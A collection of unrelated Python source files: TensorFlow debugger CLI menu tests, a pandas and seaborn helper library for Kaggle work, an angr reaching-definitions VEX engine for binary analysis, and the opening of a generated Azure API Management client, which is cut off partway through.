self.assertEqual(["help", "foo"], cmd_hist_2.most_recent_n(2))
cmd_hist_3 = debugger_cli_common.CommandHistory(
limit=3, history_file_path=self._history_file_path)
self.assertEqual(["help"], cmd_hist_3.most_recent_n(1))
self._restoreFileReadWritePermissions(self._history_file_path)
class MenuNodeTest(test_util.TensorFlowTestCase):
def testCommandTypeConstructorSucceeds(self):
menu_node = debugger_cli_common.MenuItem("water flower", "water_flower")
self.assertEqual("water flower", menu_node.caption)
self.assertEqual("water_flower", menu_node.content)
def testDisableWorks(self):
menu_node = debugger_cli_common.MenuItem("water flower", "water_flower")
self.assertTrue(menu_node.is_enabled())
menu_node.disable()
self.assertFalse(menu_node.is_enabled())
menu_node.enable()
self.assertTrue(menu_node.is_enabled())
def testConstructAsDisabledWorks(self):
menu_node = debugger_cli_common.MenuItem(
"water flower", "water_flower", enabled=False)
self.assertFalse(menu_node.is_enabled())
menu_node.enable()
self.assertTrue(menu_node.is_enabled())
class MenuTest(test_util.TensorFlowTestCase):
def setUp(self):
self.menu = debugger_cli_common.Menu()
self.assertEqual(0, self.menu.num_items())
self.node1 = debugger_cli_common.MenuItem("water flower", "water_flower")
self.node2 = debugger_cli_common.MenuItem(
"measure wavelength", "measure_wavelength")
self.menu.append(self.node1)
self.menu.append(self.node2)
self.assertEqual(2, self.menu.num_items())
def testFormatAsSingleLineWithStrItemAttrsWorks(self):
output = self.menu.format_as_single_line(
prefix="Menu: ", divider=", ", enabled_item_attrs="underline")
self.assertEqual(["Menu: water flower, measure wavelength, "], output.lines)
self.assertEqual((6, 18, [self.node1, "underline"]),
output.font_attr_segs[0][0])
self.assertEqual((20, 38, [self.node2, "underline"]),
output.font_attr_segs[0][1])
self.assertEqual({}, output.annotations)
def testFormatAsSingleLineWithListItemAttrsWorks(self):
output = self.menu.format_as_single_line(
prefix="Menu: ", divider=", ", enabled_item_attrs=["underline", "bold"])
self.assertEqual(["Menu: water flower, measure wavelength, "], output.lines)
self.assertEqual((6, 18, [self.node1, "underline", "bold"]),
output.font_attr_segs[0][0])
self.assertEqual((20, 38, [self.node2, "underline", "bold"]),
output.font_attr_segs[0][1])
self.assertEqual({}, output.annotations)
def testFormatAsSingleLineWithNoneItemAttrsWorks(self):
output = self.menu.format_as_single_line(prefix="Menu: ", divider=", ")
self.assertEqual(["Menu: water flower, measure wavelength, "], output.lines)
self.assertEqual((6, 18, [self.node1]), output.font_attr_segs[0][0])
self.assertEqual((20, 38, [self.node2]), output.font_attr_segs[0][1])
self.assertEqual({}, output.annotations)
def testInsertNode(self):
self.assertEqual(["water flower", "measure wavelength"],
self.menu.captions())
node2 = debugger_cli_common.MenuItem("write poem", "write_poem")
self.menu.insert(1, node2)
self.assertEqual(["water flower", "write poem", "measure wavelength"],
self.menu.captions())
output = self.menu.format_as_single_line(prefix="Menu: ", divider=", ")
self.assertEqual(["Menu: water flower, write poem, measure wavelength, "],
output.lines)
def testFormatAsSingleLineWithDisabledNode(self):
node2 = debugger_cli_common.MenuItem(
"write poem", "write_poem", enabled=False)
self.menu.append(node2)
output = self.menu.format_as_single_line(
prefix="Menu: ", divider=", ", disabled_item_attrs="bold")
self.assertEqual(["Menu: water flower, measure wavelength, write poem, "],
output.lines)
self.assertEqual((6, 18, [self.node1]), output.font_attr_segs[0][0])
self.assertEqual((20, 38, [self.node2]), output.font_attr_segs[0][1])
self.assertEqual((40, 50, ["bold"]), output.font_attr_segs[0][2])
class GetTensorFlowVersionLinesTest(test_util.TensorFlowTestCase):
def testGetVersionWithoutDependencies(self):
out = debugger_cli_common.get_tensorflow_version_lines()
self.assertEqual(2, len(out.lines))
self.assertEqual("TensorFlow version: %s" % pywrap_tf_session.__version__,
out.lines[0])
def testGetVersionWithDependencies(self):
out = debugger_cli_common.get_tensorflow_version_lines(True)
self.assertIn("TensorFlow version: %s" % pywrap_tf_session.__version__,
out.lines)
self.assertIn(" numpy: %s" % np.__version__, out.lines)
if __name__ == "__main__":
googletest.main()
| |
"""An ML library to help with Kaggle problems.
"""
from itertools import chain, repeat
import logging
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import sklearn.base
logger = logging.getLogger(__name__)
class Regressor(sklearn.base.BaseEstimator):
def __init__(self, estimator):
self.estimator = estimator
def fit(self, X, y):
self.model = self.estimator(X, y).fit()
def predict(self, X):
return self.model.predict(X)
class DataSet:
"""Helper class to manipulate the training and test datasets seamlessly.
Attributes
----------
df : dataframe
Full data containing both the training and test datasets.
train: dataframe
The training dataset, kept in sync with df.
test: dataframe
The test dataset, kept in sync with df.
"""
def __init__(self, raw_train, raw_test):
logger.warn('DeprecationWarning: use `pd.concat([raw_train, raw_test], keys=["train", "test"])` '
'instead of this class')
self.raw_train = raw_train
self.raw_test = raw_test
self.train = self.raw_train.copy()
self.test = self.raw_test.copy()
self.df = self.merge(self.raw_train, self.raw_test)
@staticmethod
def merge(train, test):
return pd.concat([train, test], axis=0, ignore_index=True)
def split(self, alldf):
n = self.train.shape[0]
train = alldf.iloc[:n, :].set_index(self.raw_train.index)
test = alldf.iloc[n:, :].set_index(self.raw_test.index)
return train, test
@property
def df(self):
return self._df
@df.setter
def df(self, dataframe):
self._df = dataframe
# Update the train and test datasets
self.train, self.test = self.split(self._df)
def copy(self):
"""Return a copy of the dataset."""
ds = DataSet(self.train, self.test)
ds.raw_train = self.raw_train
ds.raw_test = self.raw_test
return ds
def apply(self, func, inplace=False):
"""Apply a function func: dataframe -> dataframe
to the dataset and return the transformed dataset.
Leave raw data unchanged.
"""
df = func(self.df)
if inplace:
self.df = df
return self
else:
ds = self.copy()
ds.df = df
return ds
def __getattr__(self, attr):
"""Try to get the attribute from the the class,
otherwise try to get it from the underlying dataframe.
"""
if attr in self.__dict__:
return self.__dict__[attr]
else:
try:
return self.df.__getattr__(attr)
except AttributeError:
print("Unable to find attribute {!r} in self nor in self.df".format(attr))
raise
def fillna(df, wok, columns=None, **kwargs):
"""Apply callable parameter `wok` to fill the null values in `df`.
Can be used in a pipe chain. This is unlike the default pandas
dataframe `fillna` method that does not take a callable as a
parameter nor a `columns` parameter. The `columns` argument allows
one to apply the callable to only a subset of the input dataframe
(while still returning a dataframe of the same shape as the
original dataframe).
Parameters
----------
df: DataFrame (or Series)
The object we want to fill the null values in.
wok: callable or string
Aggregate function, of the form df -> df' = foo(df), used to
fill the null values. If it's a string, apply the method whose
name is wok. Examples: np.nanmean, np.nanmedian, 'mean',
'median'.
columns: List[str], optional
The list of columns to fill the null values in.
kwargs: dict, optional
Optional arguments passed to pd.fillna.
Returns
-------
A dataframe having the same shape as df.
"""
if columns is not None:
df = df.copy()
df.loc[:, columns] = fillna(df.loc[:, columns], wok, **kwargs)
return df
if callable(wok):
return df.fillna(wok(df), **kwargs)
elif isinstance(wok, str):
if hasattr(df, wok):
return df.fillna(getattr(df, wok)(), **kwargs)
else:
raise TypeError('{!r} method not found in {!r}', wok, df)
def has_nulls(df):
"""Return boolean indicating whether input dataframe `df` has got null values"""
return df.isnull().sum().any()
# Pipeline
# Create a pipeline so we can process all the data later in one go if needed
class Pipeline:
"""Add function to transform input dataframe. Functions can be appended to the pipeline,
and the pipeline can be called to apply all the functions successively.
When adding a functino to the pipeline, the function is only added
if it is not at the end of the pipeline already. That way we can
re-run a cell in a notebook multiple times (makes the pipeline a
little more indempotent).
"""
def __init__(self, df):
self.input_df = df
self._pipeline = []
def append(self, func):
"""Append function to pipe"""
if not self._pipeline or not self._same_func(self._pipeline[-1], func):
self._pipeline.append(func)
def __call__(self):
"""Run the pipe"""
df = self.input_df
for func in self._pipeline:
df = df.pipe(func)
return df
@staticmethod
def _same_func(f1, f2):
return f1.__name__ == f2.__name__
def __str__(self):
return str(self._pipeline)
def __repr__(self):
return repr(self._pipeline)
def __eq__(self, dg):
"""Compare the `dg` dataframe with the pipeline output"""
return all(self() == dg)
# Plotting functions
def violinplot(df, ax=None):
if ax is None:
ax = plt.gca()
sns.violinplot(df, ax=ax)
for xlab in ax.get_xticklabels():
xlab.set_rotation(30)
## Visualisation
def featureplot(df, nrows=1, ncols=1, figsize=(12,8), plotfunc=sns.violinplot, **kwargs):
"""Plot the dataframe features.
Use Matplotlib to plot individual features accross columns.
"""
logger.warning('DEPRECATED: use the more general `featureplots` instead')
width, height = figsize
fig, axes = plt.subplots(nrows, ncols, figsize=(width, height * nrows));
i = 0
plots_per_figure = max(df.shape[1] // (nrows * ncols), 1)
if nrows == 1 and ncols == 1:
axes = [axes]
if nrows > 1 and ncols > 1:
axes = chain.from_iterable(axes) # flatten the nested list
for j, ax in zip(range(plots_per_figure, df.shape[1] + 1, plots_per_figure), axes):
plotfunc(data=df.iloc[:, i:j], ax=ax, **kwargs)
i = j
plt.tight_layout()
def reshape(arr, ncols=1, nrows=-1, force=True):
"""Reshape input data to the given shape.
Fill with nans if the new shape is too large.
"""
arr = np.asarray(arr)
try:
return arr.reshape((nrows, ncols))
except ValueError:
if force:
if nrows == ncols == -1:
raise ValueError
if nrows == -1:
nrows = int(np.ceil(arr.size / ncols))
if ncols == -1:
ncols = int(np.ceil(arr.size / nrows))
size = nrows * ncols
flat = arr.flatten()
if size < flat.size:
# Chop the plot
return flat[:size].reshape((nrows, ncols))
elif size > flat.size:
new = np.zeros(size, dtype=arr.dtype)
new[:flat.size] = arr
return new.reshape((nrows, ncols))
else:
raise
def tile_funcs(plotfuncs, nrows=1, ncols=1, axis=1):
"""Return rowise iterator along axis"""
if axis == 1:
block = np.array(plotfuncs)
elif axis == 0:
block = np.array(plotfuncs).reshape((-1, 1))
row_block = np.hstack([block] * ncols)
return np.vstack([row_block] * nrows)
def tile_features(features, nfuncs, nrows=-1, ncols=1, axis=1):
"""Return rowise iterator along axis"""
def chunklist(features, nfuncs, ncols=None, axis=1):
"""Yield successive n-sized chunks from l."""
if axis == 1:
return list(chain(*zip(*repeat(features, nfuncs))))
elif axis == 0:
assert ncols is not None
n = ncols
size = int(np.ceil(len(features)/float(n))) * n
lst = list(reshape(features, ncols=size).squeeze())
res = []
for i in range(0, len(lst), n):
res.append(chain(*repeat(lst[i:i + n], nfuncs)))
return list(chain(*res))
if axis == 1:
lst = chunklist(features, nfuncs, ncols, axis)
m, n = nrows, ncols * nfuncs
return reshape(lst, ncols=n, nrows=m)
elif axis == 0:
lst = chunklist(features, nfuncs, ncols, axis=0)
m, n = nrows * nfuncs, ncols
return reshape(lst, ncols=n, nrows=m)
def featureplots(df, nrows=1, ncols=1, figsize=(4, 4),
plotfuncs=(sns.violinplot,), axis=1, **kwargs):
"""Plot the dataframe features.
Use Matplotlib to plot individual features accross columns.
"""
width, height = figsize
# Get list of functions
funcs = tile_funcs(plotfuncs, nrows, ncols, axis)
funclst = funcs.flatten()
# Get the list of features
featlst = tile_features(df.columns, len(plotfuncs), nrows, ncols, axis).flatten()
# Get rowise list of axes
m, n = funcs.shape
fig, axes = plt.subplots(nrows, ncols, figsize=(width * n, height * m));
if m == 1 and n == 1:
axes = [axes]
if m > 1 and ncols > 1:
axes = chain.from_iterable(axes) # flatten the nested list
for feature, ax, func in zip(featlst, axes, funclst):
func(feature, data=df, ax=ax, **kwargs)
plt.tight_layout()
## - using Seaborn and long form data (5 times slower than featureplot)
def featureplot2(df, ncols=1, size=5, aspect=0.5, plotfunc=sns.violinplot,
hook=None, **map_kwargs):
"""Plot the dataframe features.
Transform the input dataframe to long form and use
Seaborn's FacetGrid to plot individual features accross columns.
"""
df = df.copy()
if df.columns.name is None:
feature = df.columns.name = 'col'
else:
feature = df.columns.name
# Transform input dataframe to long form data
lf = df.stack().reset_index(name="value")
lf = lf.drop([c for c in lf.columns if c.startswith('level_')], axis=1)
# Visualize with Seaborn
g = sns.FacetGrid(lf, col=feature, hue=feature,
sharex=False, sharey=False, col_wrap=ncols,
size=size, aspect=aspect)
h = g.map(plotfunc, "value", **map_kwargs).set_titles("{col_name}")
if hook is not None:
h = hook(h)
return h
def test_reshape1():
"""Comformable data"""
assert np.all(reshape(np.arange(12), 3) == np.arange(12).reshape((-1, 3)))
def test_reshape2():
"""Not enough data"""
q = list(range(10)) + [0, 0]
assert np.all(reshape(3, force=True) == q)
def test_reshape3():
"""Too much data"""
q = list(range(12))
return all( reshape(q, nrows=2, ncols=3, force=True) == np.arange(6).reshape((2,3)) )
def test_tile_features_axis1():
res = tile_features(list('abcdef'), nfuncs=2, ncols=3, nrows=2, axis=1)
exact = np.array([['a', 'a', 'b', 'b', 'c', 'c'],
['d', 'd', 'e', 'e', 'f', 'f']])
assert np.all(res == exact)
def test_tile_features_axis0():
res = tile_features(list('abcdef'), nfuncs=2, ncols=3, nrows=2, axis=0)
exact = np.array([['a', 'b', 'c'],
['a', 'b', 'c'],
['d', 'e', 'f'],
['d', 'e', 'f']])
assert np.all(res == exact)
| |
import logging
import struct
import pyvex
from .atoms import Register, MemoryLocation, Parameter
from .constants import OP_BEFORE, OP_AFTER
from .dataset import DataSet
from .external_codeloc import ExternalCodeLocation
from .undefined import Undefined
from ...engines.light import SimEngineLightVEX, SpOffset
from ...engines.vex.irop import operations as vex_operations
from ...errors import SimEngineError
l = logging.getLogger('angr.analyses.reaching_definitions.engine_vex')
class SimEngineRDVEX(SimEngineLightVEX): # pylint:disable=abstract-method
def __init__(self, current_local_call_depth, maximum_local_call_depth, function_handler=None):
super(SimEngineRDVEX, self).__init__()
self._current_local_call_depth = current_local_call_depth
self._maximum_local_call_depth = maximum_local_call_depth
self._function_handler = function_handler
def process(self, state, *args, **kwargs):
# we are using a completely different state. Therefore, we directly call our _process() method before
# SimEngine becomes flexible enough.
try:
self._process(state, None, block=kwargs.pop('block', None))
except SimEngineError as e:
if kwargs.pop('fail_fast', False) is True:
raise e
else:
l.error(e)
return self.state
#
# Private methods
#
@staticmethod
def _external_codeloc():
return ExternalCodeLocation()
#
# VEX statement handlers
#
def _handle_Stmt(self, stmt):
if self.state.analysis:
self.state.analysis.observe(self.ins_addr, stmt, self.block, self.state, OP_BEFORE)
super(SimEngineRDVEX, self)._handle_Stmt(stmt)
if self.state.analysis:
self.state.analysis.observe(self.ins_addr, stmt, self.block, self.state, OP_AFTER)
# e.g. PUT(rsp) = t2, t2 might include multiple values
def _handle_Put(self, stmt):
reg_offset = stmt.offset
size = stmt.data.result_size(self.tyenv) / 8
reg = Register(reg_offset, size)
data = self._expr(stmt.data)
if any(type(d) is Undefined for d in data):
l.info('Data to write into register <%s> with offset %d undefined, ins_addr = %#x.',
self.arch.register_names[reg_offset], reg_offset, self.ins_addr)
self.state.kill_and_add_definition(reg, self._codeloc(), data)
# e.g. STle(t6) = t21, t6 and/or t21 might include multiple values
# sync with _handle_StoreG()
def _handle_Store(self, stmt):
addr = self._expr(stmt.addr)
size = stmt.data.result_size(self.tyenv) / 8
data = self._expr(stmt.data)
for a in addr:
if type(a) is Undefined:
l.info('Memory address undefined, ins_addr = %#x.', self.ins_addr)
else:
if any(type(d) is Undefined for d in data):
l.info('Data to write at address %#x undefined, ins_addr = %#x.', a, self.ins_addr)
memloc = MemoryLocation(a, size)
# different addresses are not killed by a subsequent iteration, because kill only removes entries
# with same index and same size
self.state.kill_and_add_definition(memloc, self._codeloc(), data)
# sync with _handle_Store()
def _handle_StoreG(self, stmt):
guard = self._expr(stmt.guard)
if guard.data == {True}:
self._handle_Store(stmt)
elif guard.data == {False}:
pass
else:
# guard.data == {True, False}
addr = self._expr(stmt.addr)
size = stmt.data.result_size(self.tyenv) / 8
# get current data
load_end = stmt.end
load_ty = self.tyenv.lookup(stmt.data.tmp)
load_addr = stmt.addr
load_expr = pyvex.IRExpr.Load(load_end, load_ty, load_addr)
data_old = self._handle_Load(load_expr)
# get new data
data_new = self._expr(stmt.data)
# merge old and new data
data_new.update(data_old)
for a in addr:
if type(a) is Undefined:
l.info('Memory address undefined, ins_addr = %#x.', self.ins_addr)
else:
if any(type(d) is Undefined for d in data_new):
l.info('Data to write at address %#x undefined, ins_addr = %#x.', a, self.ins_addr)
memloc = MemoryLocation(a, size)
# different addresses are not killed by a subsequent iteration, because kill only removes entries
# with same index and same size
self.state.kill_and_add_definition(memloc, self._codeloc(), data_new)
def _handle_LoadG(self, stmt):
guard = self._expr(stmt.guard)
if guard.data == {True}:
# FIXME: full conversion support
if stmt.cvt.find('Ident') < 0:
l.warning('Unsupported conversion %s in LoadG.', stmt.cvt)
load_expr = pyvex.expr.Load(stmt.end, stmt.cvt_types[1], stmt.addr)
wr_tmp_stmt = pyvex.stmt.WrTmp(stmt.dst, load_expr)
self._handle_WrTmp(wr_tmp_stmt)
elif guard.data == {False}:
wr_tmp_stmt = pyvex.stmt.WrTmp(stmt.dst, stmt.alt)
self._handle_WrTmp(wr_tmp_stmt)
else:
if stmt.cvt.find('Ident') < 0:
l.warning('Unsupported conversion %s in LoadG.', stmt.cvt)
load_expr = pyvex.expr.Load(stmt.end, stmt.cvt_types[1], stmt.addr)
data = set()
data.update(self._expr(load_expr).data)
data.update(self._expr(stmt.alt).data)
self._handle_WrTmpData(stmt.dst, DataSet(data, load_expr.result_size(self.tyenv)))
def _handle_Exit(self, stmt):
pass
def _handle_IMark(self, stmt):
pass
def _handle_AbiHint(self, stmt):
pass
#
# VEX expression handlers
#
def _handle_RdTmp(self, expr):
tmp = expr.tmp
if tmp in self.tmps:
return self.tmps[tmp]
return DataSet(Undefined(), expr.result_size(self.tyenv))
# e.g. t0 = GET:I64(rsp), rsp might be defined multiple times
def _handle_Get(self, expr):
reg_offset = expr.offset
size = expr.result_size(self.tyenv)
# FIXME: size, overlapping
data = set()
current_defs = self.state.register_definitions.get_objects_by_offset(reg_offset)
for current_def in current_defs:
data.update(current_def.data)
if len(data) == 0:
data.add(Undefined())
if any(type(d) is Undefined for d in data):
l.info('Data in register <%s> with offset %d undefined, ins_addr = %#x.',
self.arch.register_names[reg_offset], reg_offset, self.ins_addr)
self.state.add_use(Register(reg_offset, size), self._codeloc())
return DataSet(data, expr.result_size(self.tyenv))
# e.g. t27 = LDle:I64(t9), t9 might include multiple values
# caution: Is also called from StoreG
def _handle_Load(self, expr):
addr = self._expr(expr.addr)
size = expr.result_size(self.tyenv) / 8
data = set()
for a in addr:
if isinstance(a, (int, long)):
current_defs = self.state.memory_definitions.get_objects_by_offset(a)
if current_defs:
for current_def in current_defs:
data.update(current_def.data)
if any(type(d) is Undefined for d in data):
l.info('Memory at address %#x undefined, ins_addr = %#x.', a, self.ins_addr)
else:
mem = self.state.loader.memory.read_bytes(a, size)
if mem:
if self.arch.memory_endness == 'Iend_LE':
fmt = "<"
else:
fmt = ">"
if size == 8:
fmt += "Q"
elif size == 4:
fmt += "I"
if size in [4, 8] and size == len(mem):
mem_str = ''.join(mem)
data.add(struct.unpack(fmt, mem_str)[0])
# FIXME: _add_memory_use() iterates over the same loop
self.state.add_use(MemoryLocation(a, size), self._codeloc())
else:
l.info('Memory address undefined, ins_addr = %#x.', self.ins_addr)
if len(data) == 0:
data.add(Undefined())
return DataSet(data, expr.result_size(self.tyenv))
# CAUTION: experimental
def _handle_ITE(self, expr):
cond = self._expr(expr.cond)
if cond.data == {True}:
return self._expr(expr.iftrue)
elif cond.data == {False}:
return self._expr(expr.iffalse)
else:
if cond.data != {True, False}:
l.info('Could not resolve condition %s for ITE.', str(cond))
data = set()
data.update(self._expr(expr.iftrue).data)
data.update(self._expr(expr.iffalse).data)
return DataSet(data, expr.result_size(self.tyenv))
#
# Unary operation handlers
#
def _handle_Const(self, expr):
return DataSet(expr.con.value, expr.result_size(self.tyenv))
def _handle_Conversion(self, expr):
simop = vex_operations[expr.op]
arg_0 = self._expr(expr.args[0])
bits = int(simop.op_attrs['to_size'])
data = set()
# convert operand if possible otherwise keep it unchanged
for a in arg_0:
if type(a) is Undefined:
pass
elif isinstance(a, (int, long)):
mask = 2 ** bits - 1
a &= mask
elif type(a) is Parameter:
if type(a.value) is Register:
a.value.size = bits / 8
elif type(a.value) is SpOffset:
a.value.bits = bits
else:
l.warning('Unsupported type Parameter->%s for conversion.', type(a.value).__name__)
else:
l.warning('Unsupported type %s for conversion.', type(a).__name__)
data.add(a)
return DataSet(data, expr.result_size(self.tyenv))
def _handle_Not1(self, expr):
arg0 = expr.args[0]
expr_0 = self._expr(arg0)
if len(expr_0) == 1:
e0 = expr_0.get_first_element()
if isinstance(e0, (int, long)):
return DataSet(e0 != 1, expr.result_size(self.tyenv))
l.warning('Comparison of multiple values / different types.')
return DataSet({True, False}, expr.result_size(self.tyenv))
def _handle_Not(self, expr):
arg0 = expr.args[0]
expr_0 = self._expr(arg0)
if len(expr_0) == 1:
e0 = expr_0.get_first_element()
if isinstance(e0, (int, long)):
return DataSet(e0 == 0, expr.result_size(self.tyenv))
l.warning('Comparison of multiple values / different types.')
return DataSet({True, False}, expr.result_size(self.tyenv))
#
# Binary operation handlers
#
def _handle_Sar(self, expr):
arg0, arg1 = expr.args
expr_0 = self._expr(arg0)
expr_1 = self._expr(arg1)
size = expr.result_size(self.tyenv)
data = set()
for e0 in expr_0:
for e1 in expr_1:
try:
if e0 >> (size - 1) == 0:
head = 0
else:
head = ((1 << e1) - 1) << (size - e1)
data.add(head | (e0 >> e1))
except (ValueError, TypeError) as e:
data.add(Undefined())
l.warning(e)
return DataSet(data, expr.result_size(self.tyenv))
def _handle_CmpEQ(self, expr):
arg0, arg1 = expr.args
expr_0 = self._expr(arg0)
expr_1 = self._expr(arg1)
if len(expr_0) == 1 and len(expr_1) == 1:
e0 = expr_0.get_first_element()
e1 = expr_1.get_first_element()
if isinstance(e0, (int, long)) and isinstance(e1, (int, long)):
return DataSet(e0 == e1, expr.result_size(self.tyenv))
l.warning('Comparison of multiple values / different types.')
return DataSet({True, False}, expr.result_size(self.tyenv))
def _handle_CmpNE(self, expr):
arg0, arg1 = expr.args
expr_0 = self._expr(arg0)
expr_1 = self._expr(arg1)
if len(expr_0) == 1 and len(expr_1) == 1:
e0 = expr_0.get_first_element()
e1 = expr_1.get_first_element()
if isinstance(e0, (int, long)) and isinstance(e1, (int, long)):
return DataSet(e0 != e1, expr.result_size(self.tyenv))
l.warning('Comparison of multiple values / different types.')
return DataSet({True, False}, expr.result_size(self.tyenv))
def _handle_CmpLT(self, expr):
arg0, arg1 = expr.args
expr_0 = self._expr(arg0)
expr_1 = self._expr(arg1)
if len(expr_0) == 1 and len(expr_1) == 1:
e0 = expr_0.get_first_element()
e1 = expr_1.get_first_element()
if isinstance(e0, (int, long)) and isinstance(e1, (int, long)):
return DataSet(e0 < e1, expr.result_size(self.tyenv))
l.warning('Comparison of multiple values / different types.')
return DataSet({True, False}, expr.result_size(self.tyenv))
# ppc only
def _handle_CmpORD(self, expr):
arg0, arg1 = expr.args
expr_0 = self._expr(arg0)
expr_1 = self._expr(arg1)
if len(expr_0) == 1 and len(expr_1) == 1:
e0 = expr_0.get_first_element()
e1 = expr_1.get_first_element()
if isinstance(e0, (int, long)) and isinstance(e1, (int, long)):
if e0 < e1:
return DataSet(0x08, expr.result_size(self.tyenv))
elif e0 > e1:
return DataSet(0x04, expr.result_size(self.tyenv))
else:
return DataSet(0x02, expr.result_size(self.tyenv))
l.warning('Comparison of multiple values / different types.')
return DataSet({True, False}, expr.result_size(self.tyenv))
def _handle_CCall(self, expr):
return DataSet(Undefined(), expr.result_size(self.tyenv))
#
# User defined high level statement handlers
#
def _handle_function(self):
if self._current_local_call_depth > self._maximum_local_call_depth:
l.warning('The analysis reached its maximum recursion depth.')
return None
defs_ip = self.state.register_definitions.get_objects_by_offset(self.arch.ip_offset)
if len(defs_ip) != 1:
l.error('Invalid definition(s) for IP.')
return None
ip_data = next(iter(defs_ip)).data
if len(ip_data) != 1:
l.error('Invalid number of values for IP.')
return None
ip_addr = ip_data.get_first_element()
if not isinstance(ip_addr, (int, long)):
l.error('Invalid type %s for IP.', type(ip_addr).__name__)
return None
is_internal = False
ext_func_name = None
if self.state.loader.main_object.contains_addr(ip_addr) is True:
ext_func_name = self.state.loader.find_plt_stub_name(ip_addr)
if ext_func_name is None:
is_internal = True
else:
symbol = self.state.loader.find_symbol(ip_addr)
if symbol is not None:
ext_func_name = symbol.name
executed_rda = False
if ext_func_name is not None:
handler_name = 'handle_%s' % ext_func_name
if hasattr(self._function_handler, handler_name):
executed_rda, state = getattr(self._function_handler, handler_name)(self.state, self._codeloc())
self.state = state
else:
l.warning('Please implement the external function handler for %s() with your own logic.', ext_func_name)
handler_name = 'handle_external_function_fallback'
if hasattr(self._function_handler, handler_name):
executed_rda, state = getattr(self._function_handler, handler_name)(self.state, self._codeloc())
self.state = state
elif is_internal is True:
handler_name = 'handle_local_function'
if hasattr(self._function_handler, handler_name):
executed_rda, state = getattr(self._function_handler, handler_name)(self.state,
ip_addr,
self._current_local_call_depth + 1,
self._maximum_local_call_depth,
self._codeloc(),
)
self.state = state
else:
l.warning('Please implement the local function handler with your own logic.')
else:
l.warning('Could not find function name for external function at address %#x.', ip_addr)
# pop return address if necessary
if executed_rda is False and self.arch.call_pushes_ret is True:
defs_sp = self.state.register_definitions.get_objects_by_offset(self.arch.sp_offset)
if len(defs_sp) == 0:
raise ValueError('No definition for SP found')
elif len(defs_sp) == 1:
sp_data = next(iter(defs_sp)).data.data
else: # len(defs_sp) > 1
sp_data = set()
for d in defs_sp:
sp_data.update(d.data)
if len(sp_data) != 1:
raise ValueError('Invalid number of values for SP')
sp_addr = next(iter(sp_data))
if not isinstance(sp_addr, (int, long)):
raise TypeError('Invalid type %s for SP' % type(sp_addr).__name__)
atom = Register(self.arch.sp_offset, self.arch.bytes)
sp_addr -= self.arch.stack_change
self.state.kill_and_add_definition(atom, self._codeloc(), DataSet(sp_addr, self.arch.bits))
return None
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(
resource_group_name: str,
service_name: str,
product_id: str,
subscription_id: str,
*,
filter: Optional[str] = None,
top: Optional[int] = None,
skip: Optional[int] = None,
**kwargs: Any
) -> HttpRequest:
api_version = "2021-08-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ApiManagement/service/{serviceName}/products/{productId}/subscriptions')
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"serviceName": _SERIALIZER.url("service_name", service_name, 'str', max_length=50, min_length=1, pattern=r'^[a-zA-Z](?:[a-zA-Z0-9-]*[a-zA-Z0-9])?$'),
"productId": _SERIALIZER.url("product_id", product_id, 'str', max_length=256, min_length=1),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
if filter is not None:
query_parameters['$filter'] = _SERIALIZER.query("filter", filter, 'str')
if top is not None:
query_parameters['$top'] = _SERIALIZER.query("top", top, 'int', minimum=1)
if skip is not None:
query_parameters['$skip'] = _SERIALIZER.query("skip", skip, 'int', minimum=0)
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
class ProductSubscriptionsOperations(object):
"""ProductSubscriptionsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~api_management_client.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
resource_group_name: str,
service_name: str,
product_id: str,
filter: Optional[str] = None,
top: Optional[int] = None,
skip: Optional[int] = None,
**kwargs: Any
) -> Iterable["_models.SubscriptionCollection"]:
"""Lists the collection of subscriptions to the specified product.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param service_name: The name of the API Management service.
:type service_name: str
:param product_id: Product identifier. Must be unique in the current API Management service
instance.
:type product_id: str
:param filter: | Field | Usage | Supported operators | Supported
functions |</br>|-------------|-------------|-------------|-------------|</br>| name |
filter | ge, le, eq, ne, gt, lt | substringof, contains, startswith, endswith |</br>|
displayName | filter | ge, le, eq, ne, gt, lt | substringof, contains, startswith, endswith
|</br>| stateComment | filter | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
endswith |</br>| ownerId | filter | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
endswith |</br>| scope | filter | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
endswith |</br>| userId | filter | ge, le, eq, ne, gt, lt | substringof, contains, startswith,
